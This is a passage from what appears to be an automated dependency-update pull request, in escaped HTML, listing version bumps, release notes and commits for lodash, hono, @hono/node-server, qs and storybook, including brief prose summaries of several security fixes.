href=\"https://www.npmjs.com/package/lodash.tonumber\"\u003elodash.tonumber\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://www.npmjs.com/package/lodash.trim\"\u003elodash.trim\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://www.npmjs.com/package/lodash.trimend\"\u003elodash.trimend\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://www.npmjs.com/package/lodash.sortedindexby\"\u003elodash.sortedindexby\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://www.npmjs.com/package/lodash.zipobjectdeep\"\u003elodash.zipobjectdeep\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://www.npmjs.com/package/lodash.unset\"\u003elodash.unset\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://www.npmjs.com/package/lodash.omit\"\u003elodash.omit\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://www.npmjs.com/package/lodash.template\"\u003elodash.template\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lodash/lodash/commit/cb0b9b9212521c08e3eafe7c8cb0af1b42b6649e\"\u003e\u003ccode\u003ecb0b9b9\u003c/code\u003e\u003c/a\u003e release(patch): bump main to 4.18.1 (\u003ca href=\"https://redirect.github.com/lodash/lodash/issues/6177\"\u003e#6177\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lodash/lodash/commit/75535f57883b7225adb96de1cfc1cd4169cfcb51\"\u003e\u003ccode\u003e75535f5\u003c/code\u003e\u003c/a\u003e chore: prune stale advisory refs (\u003ca href=\"https://redirect.github.com/lodash/lodash/issues/6170\"\u003e#6170\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lodash/lodash/commit/62e91bc6a39c98d85b9ada8c44d40593deaf82a4\"\u003e\u003ccode\u003e62e91bc\u003c/code\u003e\u003c/a\u003e docs: remove n_ Node.js \u0026lt; 6 REPL note from README (\u003ca href=\"https://redirect.github.com/lodash/lodash/issues/6165\"\u003e#6165\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lodash/lodash/commit/59be2de61f8aa9461c7856533b51d31b7d8babc4\"\u003e\u003ccode\u003e59be2de\u003c/code\u003e\u003c/a\u003e release(minor): bump to 4.18.0 (\u003ca href=\"https://redirect.github.com/lodash/lodash/issues/6161\"\u003e#6161\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lodash/lodash/commit/af634573030f979194871da7c68f79420992f53d\"\u003e\u003ccode\u003eaf63457\u003c/code\u003e\u003c/a\u003e fix: broken tests for _.template 879aaa9\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lodash/lodash/commit/1073a7693e1727e0cf3641e5f71f75ddcf8de7c0\"\u003e\u003ccode\u003e1073a76\u003c/code\u003e\u003c/a\u003e fix: linting issues\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lodash/lodash/commit/879aaa93132d78c2f8d20c60279da9f8b21576d6\"\u003e\u003ccode\u003e879aaa9\u003c/code\u003e\u003c/a\u003e fix: validate imports keys in _.template\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lodash/lodash/commit/fe8d32eda854377349a4f922ab7655c8e5df9a0b\"\u003e\u003ccode\u003efe8d32e\u003c/code\u003e\u003c/a\u003e fix: block prototype pollution in baseUnset via constructor/prototype traversal\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lodash/lodash/commit/18ba0a32f42fd02117f096b032f89c984173462d\"\u003e\u003ccode\u003e18ba0a3\u003c/code\u003e\u003c/a\u003e refactor(fromPairs): use baseAssignValue for consistent assignment (\u003ca href=\"https://redirect.github.com/lodash/lodash/issues/6153\"\u003e#6153\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lodash/lodash/commit/b8190803d48d60b8c80ad45d39125f32fa618cb2\"\u003e\u003ccode\u003eb819080\u003c/code\u003e\u003c/a\u003e ci: add dist sync validation workflow (\u003ca href=\"https://redirect.github.com/lodash/lodash/issues/6137\"\u003e#6137\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/lodash/lodash/compare/4.17.23...4.18.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `@hono/node-server` from 1.19.11 to 1.19.13\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/honojs/node-server/releases\"\u003e@​hono/node-server's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev1.19.13\u003c/h2\u003e\n\u003ch2\u003eSecurity Fix\u003c/h2\u003e\n\u003cp\u003eFixed an issue in Serve Static Middleware where inconsistent handling of repeated slashes (\u003ccode\u003e//\u003c/code\u003e) between the router and static file resolution could allow middleware to be bypassed. Users of Serve Static Middleware are encouraged to upgrade to this version.\u003c/p\u003e\n\u003cp\u003eSee GHSA-92pp-h63x-v22m for details.\u003c/p\u003e\n\u003ch2\u003ev1.19.12\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003echore: ignore claude setting by \u003ca href=\"https://github.com/yusukebe\"\u003e\u003ccode\u003e@​yusukebe\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/honojs/node-server/pull/314\"\u003ehonojs/node-server#314\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix: request draining for early 413 responses by \u003ca href=\"https://github.com/usualoma\"\u003e\u003ccode\u003e@​usualoma\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/honojs/node-server/pull/329\"\u003ehonojs/node-server#329\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/honojs/node-server/compare/v1.19.11...v1.19.12\"\u003ehttps://github.com/honojs/node-server/compare/v1.19.11...v1.19.12\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/honojs/node-server/commit/fd64e659a34ec661fd9ccda00d1b9dff88dfaf90\"\u003e\u003ccode\u003efd64e65\u003c/code\u003e\u003c/a\u003e 1.19.13\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/honojs/node-server/commit/025c30f55d589ddbe6048b151d77e904f67a8cc2\"\u003e\u003ccode\u003e025c30f\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/honojs/node-server/commit/6cdb5a724952f3df5748e435637792068ebea6d9\"\u003e\u003ccode\u003e6cdb5a7\u003c/code\u003e\u003c/a\u003e 1.19.12\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/honojs/node-server/commit/70250f780ec99d2ddc0dd8275a42f8e091e06e94\"\u003e\u003ccode\u003e70250f7\u003c/code\u003e\u003c/a\u003e fix: request draining for early 413 responses (\u003ca href=\"https://redirect.github.com/honojs/node-server/issues/329\"\u003e#329\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/honojs/node-server/commit/cfc08b330a1f2e0a2d8cc7797cde389465b5f4fb\"\u003e\u003ccode\u003ecfc08b3\u003c/code\u003e\u003c/a\u003e chore: ignore claude setting (\u003ca href=\"https://redirect.github.com/honojs/node-server/issues/314\"\u003e#314\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/honojs/node-server/compare/v1.19.11...v1.19.13\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `hono` from 4.12.8 to 4.12.18\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/honojs/hono/releases\"\u003ehono's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev4.12.18\u003c/h2\u003e\n\u003ch2\u003eSecurity fixes\u003c/h2\u003e\n\u003cp\u003eThis release includes fixes for the following security issues:\u003c/p\u003e\n\u003ch3\u003eCache Middleware ignores Vary: Authorization / Vary: Cookie leading to cross-user cache leakage\u003c/h3\u003e\n\u003cp\u003eAffects: Cache Middleware. Fixes missing cache-skip handling for \u003ccode\u003eVary: Authorization\u003c/code\u003e and \u003ccode\u003eVary: Cookie\u003c/code\u003e, where a response cached for one authenticated user could be served to other users. GHSA-p77w-8qqv-26rm\u003c/p\u003e\n\u003ch3\u003eCSS Declaration Injection via Style Object Values in JSX SSR\u003c/h3\u003e\n\u003cp\u003eAffects: hono/jsx. Fixes a missing CSS-context escape for \u003ccode\u003estyle\u003c/code\u003e object values and property names, where untrusted input could inject additional CSS declarations. The impact is limited to CSS and does not allow JavaScript execution. GHSA-qp7p-654g-cw7p\u003c/p\u003e\n\u003ch3\u003eImproper validation of NumericDate claims (exp, nbf, iat) in JWT verify()\u003c/h3\u003e\n\u003cp\u003eAffects: \u003ccode\u003ehono/utils/jwt\u003c/code\u003e. Fixes improper validation of \u003ccode\u003eexp\u003c/code\u003e, \u003ccode\u003enbf\u003c/code\u003e, and \u003ccode\u003eiat\u003c/code\u003e claims, where falsy, non-finite, or non-numeric values could silently bypass time-based checks instead of being rejected per RFC 7519. GHSA-hm8q-7f3q-5f36\u003c/p\u003e\n\u003chr /\u003e\n\u003cp\u003eUsers who use the JWT helper, hono/jsx, or the Cache middleware are strongly encouraged to upgrade to this version.\u003c/p\u003e\n\u003ch2\u003ev4.12.17\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efix(jsx): normalize SVG attributes on the \u003c!-- raw HTML omitted --\u003e root element by \u003ca href=\"https://github.com/kfly8\"\u003e\u003ccode\u003e@​kfly8\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/honojs/hono/pull/4893\"\u003ehonojs/hono#4893\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix(ssg): add \u003ccode\u003eatom+xml\u003c/code\u003e and \u003ccode\u003erss+xml\u003c/code\u003e to \u003ccode\u003edefaultExtensionMap\u003c/code\u003e by \u003ca href=\"https://github.com/yuintei\"\u003e\u003ccode\u003e@​yuintei\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/honojs/hono/pull/4899\"\u003ehonojs/hono#4899\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix(cors): make origin optional in CORSOptions by \u003ca href=\"https://github.com/truffle-dev\"\u003e\u003ccode\u003e@​truffle-dev\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/honojs/hono/pull/4905\"\u003ehonojs/hono#4905\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix(types): propagate middleware response types to app.on overloads by \u003ca href=\"https://github.com/T4ko0522\"\u003e\u003ccode\u003e@​T4ko0522\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/honojs/hono/pull/4906\"\u003ehonojs/hono#4906\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kfly8\"\u003e\u003ccode\u003e@​kfly8\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/honojs/hono/pull/4893\"\u003ehonojs/hono#4893\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/truffle-dev\"\u003e\u003ccode\u003e@​truffle-dev\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/honojs/hono/pull/4905\"\u003ehonojs/hono#4905\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/honojs/hono/compare/v4.12.16...v4.12.17\"\u003ehttps://github.com/honojs/hono/compare/v4.12.16...v4.12.17\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev4.12.16\u003c/h2\u003e\n\u003ch2\u003eSecurity fixes\u003c/h2\u003e\n\u003cp\u003eThis release includes fixes for the following security issues:\u003c/p\u003e\n\u003ch3\u003eUnvalidated JSX Tag Names in hono/jsx May Allow HTML Injection\u003c/h3\u003e\n\u003cp\u003eAffects: hono/jsx. Fixes missing validation of JSX tag names when using \u003ccode\u003ejsx()\u003c/code\u003e or \u003ccode\u003ecreateElement()\u003c/code\u003e, which could allow HTML injection if untrusted input is used as the tag name. GHSA-69xw-7hcm-h432\u003c/p\u003e\n\u003ch3\u003ebodyLimit() can be bypassed for chunked / unknown-length requests\u003c/h3\u003e\n\u003cp\u003eAffects: Body Limit Middleware. Fixes late enforcement for request bodies without a reliable Content-Length (e.g. chunked requests), where oversized requests could reach handlers and return successful responses before being rejected. GHSA-9vqf-7f2p-gf9v\u003c/p\u003e\n\u003ch2\u003ev4.12.15\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efix(jwt): support single-line PEM keys by \u003ca href=\"https://github.com/hiendv\"\u003e\u003ccode\u003e@​hiendv\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/honojs/hono/pull/4889\"\u003ehonojs/hono#4889\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/honojs/hono/commit/f10dee89ced5956b73c1cdc416d6bc0fd54d63b7\"\u003e\u003ccode\u003ef10dee8\u003c/code\u003e\u003c/a\u003e 4.12.18\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/honojs/hono/commit/a5bd9ebead279ed9d0239ecbd854f629edfc0e57\"\u003e\u003ccode\u003ea5bd9eb\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/honojs/hono/commit/58d3d3ad5656e007ed99da1b73865975952de5e9\"\u003e\u003ccode\u003e58d3d3a\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/honojs/hono/commit/568c2ecc1dd556894fad4dfa4a7ba499db6dba9c\"\u003e\u003ccode\u003e568c2ec\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/honojs/hono/commit/ff2b3d31df1be35f7d597a95dd3369402b6e87f2\"\u003e\u003ccode\u003eff2b3d3\u003c/code\u003e\u003c/a\u003e 4.12.17\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/honojs/hono/commit/52aaaf9714b06303ce5caa655b1d80675be687e9\"\u003e\u003ccode\u003e52aaaf9\u003c/code\u003e\u003c/a\u003e fix(types): propagate middleware response types to app.on overloads (\u003ca href=\"https://redirect.github.com/honojs/hono/issues/4906\"\u003e#4906\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/honojs/hono/commit/76d5589e9b0569f4e74ec37e8dd6979455f70dfa\"\u003e\u003ccode\u003e76d5589\u003c/code\u003e\u003c/a\u003e fix(cors): make origin optional in CORSOptions (\u003ca href=\"https://redirect.github.com/honojs/hono/issues/4905\"\u003e#4905\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/honojs/hono/commit/8f027e5574e91e3c7f263a728656e3888559e51a\"\u003e\u003ccode\u003e8f027e5\u003c/code\u003e\u003c/a\u003e fix(ssg): add \u003ccode\u003eatom+xml\u003c/code\u003e and \u003ccode\u003erss+xml\u003c/code\u003e to \u003ccode\u003edefaultExtensionMap\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/honojs/hono/issues/4899\"\u003e#4899\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/honojs/hono/commit/bfba97ca7ea3d4541a3419f1749e5a1a3e8f1727\"\u003e\u003ccode\u003ebfba97c\u003c/code\u003e\u003c/a\u003e fix(jsx): normalize SVG attributes on the \u0026lt;svg\u0026gt; root element (\u003ca href=\"https://redirect.github.com/honojs/hono/issues/4893\"\u003e#4893\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/honojs/hono/commit/90d4182aabd328e2ec6af3f25ec62ddc574ad8cb\"\u003e\u003ccode\u003e90d4182\u003c/code\u003e\u003c/a\u003e 4.12.16\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/honojs/hono/compare/v4.12.8...v4.12.18\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `qs` from 6.14.2 to 6.15.2\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/ljharb/qs/blob/main/CHANGELOG.md\"\u003eqs's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e\u003cstrong\u003e6.15.2\u003c/strong\u003e\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e[Fix] \u003ccode\u003estringify\u003c/code\u003e: skip null/undefined entries in \u003ccode\u003earrayFormat: 'comma'\u003c/code\u003e + \u003ccode\u003eencodeValuesOnly\u003c/code\u003e instead of crashing in \u003ccode\u003eencoder\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e[Fix] \u003ccode\u003estringify\u003c/code\u003e: use configured \u003ccode\u003edelimiter\u003c/code\u003e after \u003ccode\u003echarsetSentinel\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/555\"\u003e#555\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[Fix] \u003ccode\u003estringify\u003c/code\u003e: apply \u003ccode\u003eformatter\u003c/code\u003e to encoded key under \u003ccode\u003estrictNullHandling\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/554\"\u003e#554\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[Fix] \u003ccode\u003estringify\u003c/code\u003e: skip null/undefined filter-array entries instead of crashing in \u003ccode\u003eencoder\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/551\"\u003e#551\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[Fix] \u003ccode\u003eparse\u003c/code\u003e: handle nested bracket groups and add regression tests (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/530\"\u003e#530\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[readme] fix grammar (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/550\"\u003e#550\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[Dev Deps] update \u003ccode\u003e@ljharb/eslint-config\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e[Tests] add regression tests for keys containing percent-encoded bracket text\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003cstrong\u003e6.15.1\u003c/strong\u003e\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e[Fix] \u003ccode\u003eparse\u003c/code\u003e: \u003ccode\u003eparameterLimit: Infinity\u003c/code\u003e with \u003ccode\u003ethrowOnLimitExceeded: true\u003c/code\u003e silently drops all parameters\u003c/li\u003e\n\u003cli\u003e[Deps] update \u003ccode\u003e@ljharb/eslint-config\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e[Dev Deps] update \u003ccode\u003e@ljharb/eslint-config\u003c/code\u003e, \u003ccode\u003eiconv-lite\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e[Tests] increase coverage\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003cstrong\u003e6.15.0\u003c/strong\u003e\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e[New] \u003ccode\u003eparse\u003c/code\u003e: add \u003ccode\u003estrictMerge\u003c/code\u003e option to wrap object/primitive conflicts in an array (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/425\"\u003e#425\u003c/a\u003e, \u003ca href=\"https://redirect.github.com/ljharb/qs/issues/122\"\u003e#122\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[Fix] \u003ccode\u003eduplicates\u003c/code\u003e option should not apply to bracket notation keys (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/514\"\u003e#514\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/9aca4076fe788338c67cf7e115f0be6bc58d85a8\"\u003e\u003ccode\u003e9aca407\u003c/code\u003e\u003c/a\u003e v6.15.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/5e33d33447ed0bf1ddab9abc41d27dea4687d992\"\u003e\u003ccode\u003e5e33d33\u003c/code\u003e\u003c/a\u003e [Dev Deps] update \u003ccode\u003e@ljharb/eslint-config\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/21f80b33e5c8b3f7eba1034fff0da4a4a37a1d41\"\u003e\u003ccode\u003e21f80b3\u003c/code\u003e\u003c/a\u003e [Fix] \u003ccode\u003estringify\u003c/code\u003e: skip null/undefined entries in \u003ccode\u003earrayFormat: 'comma'\u003c/code\u003e + `e...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/a0a81ea2071acce3eff41a040f719ac8f5c4f64c\"\u003e\u003ccode\u003ea0a81ea\u003c/code\u003e\u003c/a\u003e [Fix] \u003ccode\u003estringify\u003c/code\u003e: use configured \u003ccode\u003edelimiter\u003c/code\u003e after \u003ccode\u003echarsetSentinel\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/e3062f78f5233b338ceeb8e8dfa5a07dea4b32a8\"\u003e\u003ccode\u003ee3062f7\u003c/code\u003e\u003c/a\u003e [Fix] \u003ccode\u003estringify\u003c/code\u003e: apply \u003ccode\u003eformatter\u003c/code\u003e to encoded key under \u003ccode\u003estrictNullHandling\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/0c180a40adb8c6703fffc85b2ff06ca209f5c1e0\"\u003e\u003ccode\u003e0c180a4\u003c/code\u003e\u003c/a\u003e [Fix] \u003ccode\u003estringify\u003c/code\u003e: skip null/undefined filter-array entries instead of crashi...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/3a8b94aec19bd664720f6f6b1e66c4a0dfe4b656\"\u003e\u003ccode\u003e3a8b94a\u003c/code\u003e\u003c/a\u003e [Tests] add regression tests for keys containing percent-encoded bracket text\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/96755abd357c0e534dd3442a84a04d08864bfe0d\"\u003e\u003ccode\u003e96755ab\u003c/code\u003e\u003c/a\u003e [readme] fix grammar\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/a419ce5bbfcdb98a299f1a0bb47ea055baef20e6\"\u003e\u003ccode\u003ea419ce5\u003c/code\u003e\u003c/a\u003e [Fix] \u003ccode\u003eparse\u003c/code\u003e: handle nested bracket groups and add regression tests\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/3f5e1c528c967d915096787efbffa73cf6044170\"\u003e\u003ccode\u003e3f5e1c5\u003c/code\u003e\u003c/a\u003e v6.15.1\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/ljharb/qs/compare/v6.14.2...v6.15.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `storybook` from 8.5.2 to 8.6.17\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/storybookjs/storybook/releases\"\u003estorybook's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev8.6.17\u003c/h2\u003e\n\u003ch2\u003e8.6.17\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eHarden websocket connection\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev8.6.16\u003c/h2\u003e\n\u003ch2\u003e8.6.16\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eNo-op release. No changes.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/storybookjs/storybook/blob/v8.6.17/CHANGELOG.md\"\u003estorybook's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e8.6.17\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eHarden websocket connection\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.6.16\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eNo-op release. No changes.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.6.14\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eCLI: Add skip onboarding, recommended/minimal config - \u003ca href=\"https://redirect.github.com/storybookjs/storybook/pull/30930\"\u003e#30930\u003c/a\u003e, thanks \u003ca href=\"https://github.com/shilman\"\u003e\u003ccode\u003e@​shilman\u003c/code\u003e\u003c/a\u003e!\u003c/li\u003e\n\u003cli\u003eCore: Fix using dates in expect statements - \u003ca href=\"https://redirect.github.com/storybookjs/storybook/pull/28413\"\u003e#28413\u003c/a\u003e, thanks \u003ca href=\"https://github.com/yann-combarnous\"\u003e\u003ccode\u003e@​yann-combarnous\u003c/code\u003e\u003c/a\u003e!\u003c/li\u003e\n\u003cli\u003eReact Native Web: Fix expo router by setting JSX to automatic - \u003ca href=\"https://redirect.github.com/storybookjs/storybook/pull/31484\"\u003e#31484\u003c/a\u003e, thanks \u003ca href=\"https://github.com/dannyhw\"\u003e\u003ccode\u003e@​dannyhw\u003c/code\u003e\u003c/a\u003e!\u003c/li\u003e\n\u003cli\u003eTest: Make sure that lit arrays are not cloned - \u003ca href=\"https://redirect.github.com/storybookjs/storybook/pull/31435\"\u003e#31435\u003c/a\u003e, thanks \u003ca href=\"https://github.com/kasperpeulen\"\u003e\u003ccode\u003e@​kasperpeulen\u003c/code\u003e\u003c/a\u003e!\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.6.13\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eControls: Fix boxShadow on empty controls - \u003ca href=\"https://redirect.github.com/storybookjs/storybook/pull/27193\"\u003e#27193\u003c/a\u003e, thanks \u003ca href=\"https://github.com/H0onnn\"\u003e\u003ccode\u003e@​H0onnn\u003c/code\u003e\u003c/a\u003e!\u003c/li\u003e\n\u003cli\u003eReact Native Web: Update \u003ccode\u003ereact-native-web\u003c/code\u003e - \u003ca href=\"https://redirect.github.com/storybookjs/storybook/pull/31324\"\u003e#31324\u003c/a\u003e, thanks \u003ca href=\"https://github.com/ndelangen\"\u003e\u003ccode\u003e@​ndelangen\u003c/code\u003e\u003c/a\u003e!\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.6.12\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eCLI: Only install Visual Test Addon if test feature is selected - \u003ca href=\"https://redirect.github.com/storybookjs/storybook/pull/30966\"\u003e#30966\u003c/a\u003e, thanks \u003ca href=\"https://github.com/ghengeveld\"\u003e\u003ccode\u003e@​ghengeveld\u003c/code\u003e\u003c/a\u003e!\u003c/li\u003e\n\u003cli\u003eCore: Fix telemetry error on Storybook UI - \u003ca href=\"https://redirect.github.com/storybookjs/storybook/pull/30953\"\u003e#30953\u003c/a\u003e, thanks \u003ca href=\"https://github.com/yannbf\"\u003e\u003ccode\u003e@​yannbf\u003c/code\u003e\u003c/a\u003e!\u003c/li\u003e\n\u003cli\u003eEmber: Fix 